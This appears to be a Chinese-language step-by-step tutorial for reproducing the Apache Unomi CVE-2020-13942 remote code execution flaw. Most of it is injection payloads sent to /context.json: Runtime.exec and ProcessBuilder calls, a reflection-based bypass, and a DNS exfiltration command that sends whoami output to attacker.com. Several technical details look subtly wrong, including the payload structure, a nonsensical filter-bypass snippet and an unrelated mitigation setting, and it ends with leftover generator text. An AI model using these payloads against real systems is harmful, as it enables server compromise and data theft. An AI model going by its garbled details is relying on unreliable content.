怎么實現Apache Unomi 遠程代碼執行漏洞CVE-2020-13942復現

# 怎么實現Apache Unomi 遠程代碼執行漏洞CVE-2020-13942復現

## 漏洞概述

CVE-2020-13942是Apache Unomi在2020年披露的一個高危遠程代碼執行漏洞。該漏洞存在于Unomi的MVEL表達式解析機制中，攻擊者可通過構造惡意請求實現服務器端任意代碼執行，直接影響系統安全性。

### 受影響版本
- Apache Unomi 1.5.x系列（<= 1.5.1）
- 部分早期版本可能同樣受影響

## 環境搭建

### 準備工具
1. **漏洞環境**：Apache Unomi 1.5.1
   ```bash
   docker run -p 8181:8181 -d apache/unomi:1.5.1

1. 測試工具：
   • Burp Suite/Postman
   • curl命令行工具
   • Python3（用于POC編寫）

環境驗證

訪問http://localhost:8181應看到Unomi歡迎頁面，或通過API端點檢查：

curl http://localhost:8181/cxs/

漏洞原理分析

技術背景

Unomi使用MVEL表達式語言進行條件評估，關鍵問題出在： 1. 未過濾的表達式解析：/context.json端點直接處理用戶輸入的MVEL表達式 2. Java反射機制濫用：通過MVEL可調用Java類方法（如Runtime.exec()）

漏洞觸發點

// 偽代碼展示漏洞邏輯
public Response handleContextRequest(@RequestBody String body) {
    MVEL.eval(body); // 危險的無過濾解析
}

復現步驟

步驟1：基礎探測

發送正常請求確認服務可用性：

POST /context.json HTTP/1.1
Host: localhost:8181
Content-Type: application/json

{
    "filters": [
        {
            "id": "sampleFilter",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "test": "hello world"
                        }
                    }
                }
            ]
        }
    ]
}

步驟2：注入MVEL表達式

測試簡單表達式執行：

{
    "filters": [
        {
            "id": "exploitFilter",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "test": "new java.lang.ProcessBuilder('calc').start()"
                        }
                    }
                }
            ]
        }
    ]
}

步驟3：構造RCE Payload

完整利用鏈示例（Linux系統）：

{
    "personalizations": [
        {
            "id": "malicious",
            "strategy": "matching-first",
            "strategyOptions": {
                "fallback": "var1"
            },
            "contents": [
                {
                    "filters": [
                        {
                            "condition": {
                                "parameterValues": {
                                    "test": "java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')"
                                }
                            }
                        }
                    ]
                }
            ]
        }
    ]
}

步驟4：驗證執行結果

檢查命令是否執行成功：

docker exec -it [container_id] ls /tmp
# 應看到pwned文件被創建

高級利用技巧

繞過限制方法

1. 字符過濾繞過：

   // 使用字符串拼接
   "test": "j"+"a"+"v"+"a".toUpperCase()
   

2. 利用反射調用：

   "test": "Class.forName('java.lang.Runtime').getMethod('exec', String.class).invoke(null, 'id')"
   

回顯型Payload

通過DNS外帶數據：

"test": "java.lang.Runtime.getRuntime().exec('nslookup $(whoami).attacker.com')"

修復方案

官方補丁

升級到Apache Unomi 1.5.2+版本，主要修復措施： 1. 禁用危險的MVEL表達式功能 2. 增加輸入過濾機制

臨時緩解措施

# 在unomi配置文件中禁用相關端點
org.apache.unomi.router.export.enabled=false

法律與道德聲明

1. 本技術文章僅限安全研究使用
2. 未經授權測試他人系統屬于違法行為
3. 建議在隔離環境進行復現測試

參考資源

1. Apache官方安全公告
2. CVE詳細記錄
3. MVEL語法文檔

注意：實際操作時請確保在授權環境下進行，本文所述方法不得用于非法用途。漏洞復現可能對系統造成影響，建議使用虛擬機環境測試。 “`

該文檔包含： 1. 完整的漏洞復現流程 2. 多種Payload示例 3. 修復建議和安全聲明 4. 代碼塊和格式優化 5. 技術細節與原理說明

可根據實際測試環境調整IP/端口等參數，Windows系統需修改命令為calc.exe等對應指令。